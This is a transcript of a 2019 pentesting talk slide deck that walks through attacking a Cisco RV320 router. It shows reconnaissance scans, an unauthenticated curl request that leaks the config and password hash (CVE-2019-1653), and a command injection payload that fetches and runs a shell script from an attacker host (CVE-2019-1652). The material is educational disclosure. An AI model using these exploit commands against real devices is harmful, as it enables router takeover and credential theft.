Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers...
Transcript of Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers...
![Page 1: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/1.jpg)
PentestingPentestingJonas Lieb5 July 2019
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 1
![Page 2: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/2.jpg)
$ whoami$ whoami
Jonas Lieb
Penetration Tester atRedTeam Pentesting
former physics student at RWTH AachenUniversity (IIIA)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 2
![Page 3: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/3.jpg)
RedTeam PentestingRedTeam Pentesting
Founded in 2004
from Aachen
10 pentesters
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 3
![Page 4: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/4.jpg)
What is a pentest?What is a pentest?controlled attack
same methods as "evil" hackers
stipulated scope
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 4
![Page 5: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/5.jpg)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 5
![Page 6: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/6.jpg)
Contract
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 5
![Page 7: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/7.jpg)
Contract
Attack
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 5
![Page 8: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/8.jpg)
Contract
Attack
Documentation
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 5
![Page 9: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/9.jpg)
Contract
Attack
Documentation
Workshop
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 5
![Page 10: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/10.jpg)
Example: Cisco RV320 RouterExample: Cisco RV320 RouterSmall-Business-Router
Gigabit
VPN Support
sold since 2013, support until 2023 firmware version v1.4.2.17 (Oct. 2017)
(installed at customer's site)www.cisco.com: Cisco RV320 Dual Gigabit WAN VPN Router
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 6
![Page 11: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/11.jpg)
TCP Services on LAN (Internal) PortsTCP Services on LAN (Internal) Ports$ nmap -p 0- -sV -sS -T4 192.168.10.1
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 7
![Page 12: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/12.jpg)
TCP Services on LAN (Internal) PortsTCP Services on LAN (Internal) Ports$ nmap -p 0- -sV -sS -T4 192.168.10.1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-04 15:51 CEST Nmap scan report for routera294b2.local (192.168.10.1) Host is up (0.0025s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 53/tcp open domain dnsmasq 2.40 80/tcp open http nginx 1.10.1 443/tcp open ssl/http nginx 1.10.1 1723/tcp open pptp linux (Firmware: 1) 8000/tcp open http Apache httpd 8007/tcp open http Apache httpd 8008/tcp open http 8443/tcp open ssl/http Apache httpd
MAC Address: 44:03:A7:A2:94:B2 (Cisco Systems) Service Info: Host: local Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 108.85 seconds
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 7
![Page 13: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/13.jpg)
WEB INTERFACE
TCP Services on LAN (Internal) PortsTCP Services on LAN (Internal) Ports$ nmap -p 0- -sV -sS -T4 192.168.10.1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-04 15:51 CEST Nmap scan report for routera294b2.local (192.168.10.1) Host is up (0.0025s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 53/tcp open domain dnsmasq 2.40 80/tcp open http nginx 1.10.1 443/tcp open ssl/http nginx 1.10.1 1723/tcp open pptp linux (Firmware: 1) 8000/tcp open http Apache httpd 8007/tcp open http Apache httpd 8008/tcp open http 8443/tcp open ssl/http Apache httpd
MAC Address: 44:03:A7:A2:94:B2 (Cisco Systems) Service Info: Host: local Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 108.85 seconds
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 7
![Page 14: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/14.jpg)
WEB INTERFACE
WEB INTERFACE (2)
TCP Services on LAN (Internal) PortsTCP Services on LAN (Internal) Ports$ nmap -p 0- -sV -sS -T4 192.168.10.1 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-04 15:51 CEST Nmap scan report for routera294b2.local (192.168.10.1) Host is up (0.0025s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 53/tcp open domain dnsmasq 2.40 80/tcp open http nginx 1.10.1 443/tcp open ssl/http nginx 1.10.1 1723/tcp open pptp linux (Firmware: 1) 8000/tcp open http Apache httpd 8007/tcp open http Apache httpd 8008/tcp open http 8443/tcp open ssl/http Apache httpd
MAC Address: 44:03:A7:A2:94:B2 (Cisco Systems) Service Info: Host: local Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 108.85 seconds
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 7
![Page 15: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/15.jpg)
TCP Services on WAN (Internet Facing) PortsTCP Services on WAN (Internet Facing) Ports(only applies to v1.4.2.15, Aug. - Oct. 2017)
$ nmap -p 0- -sV -sS -T4 192.168.11.146
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 8
![Page 16: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/16.jpg)
TCP Services on WAN (Internet Facing) PortsTCP Services on WAN (Internet Facing) Ports(only applies to v1.4.2.15, Aug. - Oct. 2017)
$ nmap -p 0- -sV -sS -T4 192.168.11.146 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-17 18:16 CEST Nmap scan report for 192.168.11.146 Host is up (0.0010s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 1723/tcp open pptp linux (Firmware: 1) 8007/tcp open http Apache httpd 8008/tcp open http
Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 187.64 seconds
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 8
![Page 17: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/17.jpg)
WEB INTERFACE (2)
TCP Services on WAN (Internet Facing) PortsTCP Services on WAN (Internet Facing) Ports(only applies to v1.4.2.15, Aug. - Oct. 2017)
$ nmap -p 0- -sV -sS -T4 192.168.11.146 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-17 18:16 CEST Nmap scan report for 192.168.11.146 Host is up (0.0010s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 1723/tcp open pptp linux (Firmware: 1) 8007/tcp open http Apache httpd 8008/tcp open http
Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 187.64 seconds
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 8
![Page 18: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/18.jpg)
so�ware.cisco.com: Firmware Download for Version 1.4.2.17
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 9
![Page 19: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/19.jpg)
Firmware AnalysisFirmware Analysis$ binwalk RV32X_v1.4.2.17_20171030-code.bin
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 10
![Page 20: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/20.jpg)
Firmware AnalysisFirmware Analysis$ binwalk RV32X_v1.4.2.17_20171030-code.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 64 0x40 ELF, 64-bit MSB MIPS32 rel2 executable, MIPS, version 1 (SYSV) 5353552 0x51B050 Linux kernel version "2.6.32.13-Cavium-Octeon (root@paul-i7-pc) (gcc version 4.3.3 (Cavium Networks Version: 2_0_0 build 99) ) #2 SMP Mon Oct 30 15:52" 5373352 0x51FDA8 gzip compressed data, maximum compression, from Unix, last modified: 2017-10-30 07:27:56 5516080 0x542B30 CRC32 polynomial table, little endian
7143488 0x6D0040 gzip compressed data, maximum compression, from Unix, last modified: 2017-10-30 07:52:30 ROOT-FS
29360128 0x1C00000 CramFS filesystem, big endian size 7122944 version 2 WEB INTERFACE sorted_dirs CRC 0x9E0F53FE, edition 0, 5815 blocks, 1854 files
[...]
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 10
![Page 21: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/21.jpg)
Application After ExtractionApplication After Extraction $ tree . ├── cert-bin │ └── certVerifyLogin.cgi -> ../cgi-bin/userLogin.cgi ├── cgi-bin │ ├── accesspoint.html │ ├── addcifsbookmark.html │ ├── adddesktopbookmark.html │ ├── addservicesbookmark.html │ ├── anti_arp.bat │ ├── api -> ../../var/ │ ├── browser_error.html │ ├── cifs -> singlecifs │ ├── cifs-upload -> singlecifs │ ├── climiterror.html │ ├── compareDB -> single_cgi │ ├── config_adv.exp │ ├── config.exp │ ├── config_mirror.exp │ ├── desktop1.html
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 11
![Page 22: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/22.jpg)
Application After ExtractionApplication After Extraction $ tree . ├── cert-bin │ └── certVerifyLogin.cgi -> ../cgi-bin/userLogin.cgi ├── cgi-bin │ ├── accesspoint.html │ ├── addcifsbookmark.html │ ├── adddesktopbookmark.html │ ├── addservicesbookmark.html │ ├── anti_arp.bat │ ├── api -> ../../var/ │ ├── browser_error.html │ ├── cifs -> singlecifs │ ├── cifs-upload -> singlecifs │ ├── climiterror.html │ ├── compareDB -> single_cgi │ ├── config_adv.exp │ ├── config.exp URL: /CGI-BIN/CONFIG.EXP │ ├── config_mirror.exp │ ├── desktop1.html
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 11
![Page 23: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/23.jpg)
Curl 😉Curl 😉$ curl --insecure https://192.168.10.1/cgi-bin/config.exp
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 12
![Page 24: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/24.jpg)
Curl 😉Curl 😉$ curl --insecure https://192.168.10.1/cgi-bin/config.exp ####sysconfig#### [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX
[SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 PASSWORD HASH
[...]
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 12
![Page 25: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/25.jpg)
Curl 😉Curl 😉
066bae9070a9a95b3e03019db131cd40 = md5("cisco1964300002")
$ curl --insecure https://192.168.10.1/cgi-bin/config.exp ####sysconfig#### [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX
[SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 PASSWORD HASH
[...]
[...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 12
![Page 26: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/26.jpg)
Curl 😉Curl 😉
066bae9070a9a95b3e03019db131cd40 = md5("cisco1964300002")
$ curl --insecure https://192.168.10.1/cgi-bin/config.exp ####sysconfig#### [VERSION] VERSION=73 MODEL=RV320 SSL=0 IPSEC=0 PPTP=0 PLATFORMCODE=RV0XX
[SYSTEM] HOSTNAME=router DOMAINNAME=example.com DOMAINCHANGE=1 USERNAME=cisco PASSWD=066bae9070a9a95b3e03019db131cd40 PASSWORD HASH
[...]
[...]
CVE-2019-1653 (Unauthenticated Configuration Export)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 12
![Page 27: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/27.jpg)
HTTP Requests During LoginHTTP Requests During Login
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 13
![Page 28: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/28.jpg)
HTTP Requests During LoginHTTP Requests During Login
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 13
![Page 29: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/29.jpg)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 14
![Page 30: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/30.jpg)
Certificate GeneratorCertificate Generator
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 15
![Page 31: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/31.jpg)
Reverse EngineeringReverse Engineering
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 16
![Page 32: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/32.jpg)
// /usr/sbin/nk_confd_process, function confd_cert_generate sprintf( command, "openssl req -new -nodes -subj" "\'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s/\'" " -keyout%s%s.key -out %s%s.csr -newkey rsa:%s", countryName, stateOrProvinceName, locality, organization, organizationalUnit, commonName, emailAddress, "/etc/flash/ca/private/", &caIdStr, "/etc/flash/ca/certs/", &caIdStr, keyLength); system(command);
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 17
![Page 33: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/33.jpg)
commonName = "a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b";
// /usr/sbin/nk_confd_process, function confd_cert_generate sprintf( command, "openssl req -new -nodes -subj" "\'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s/\'" " -keyout%s%s.key -out %s%s.csr -newkey rsa:%s", countryName, stateOrProvinceName, locality, organization, organizationalUnit, commonName, emailAddress, "/etc/flash/ca/private/", &caIdStr, "/etc/flash/ca/certs/", &caIdStr, keyLength); system(command);
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 17
![Page 34: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/34.jpg)
openssl req -new -nodes -subj \ '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit /CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b /[email protected]/' [...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 18
![Page 35: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/35.jpg)
openssl req -new -nodes -subj \ '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit /CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b /[email protected]/' [...]
openssl req -new -nodes -subj \ '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit /CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b /[email protected]/' [...]
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 18
![Page 36: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/36.jpg)
openssl req -new -nodes -subj \ '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit /CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b /[email protected]/' [...]
openssl req -new -nodes -subj \ '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit /CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b /[email protected]/' [...]
CVE-2019-1652 (Command Injection)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 18
![Page 37: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/37.jpg)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 19
![Page 38: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/38.jpg)
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 20
![Page 39: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/39.jpg)
What now?What now?
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 21
![Page 40: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/40.jpg)
What now?What now?Reconfigure router
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 21
![Page 41: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/41.jpg)
What now?What now?Reconfigure routerSni� network tra�ic
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 21
![Page 42: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/42.jpg)
What now?What now?Reconfigure routerSni� network tra�icManipulate network tra�ic
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 21
![Page 43: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/43.jpg)
What now?What now?Reconfigure routerSni� network tra�icManipulate network tra�icAttack internal systems
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 21
![Page 44: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/44.jpg)
Risk = Probability of Occurence × ImpactRisk = Probability of Occurence × Impact
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 22
![Page 45: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/45.jpg)
Risk = Probability of Occurence × ImpactRisk = Probability of Occurence × Impactprobability of occurence: high
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 22
![Page 46: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/46.jpg)
Risk = Probability of Occurence × ImpactRisk = Probability of Occurence × Impactprobability of occurence: high
impact: high
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 22
![Page 47: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/47.jpg)
Risk = Probability of Occurence × ImpactRisk = Probability of Occurence × Impactprobability of occurence: high
impact: high
⇨ risk: high
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 22
![Page 48: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/48.jpg)
SolutionsSolutions??
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 23
![Page 49: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/49.jpg)
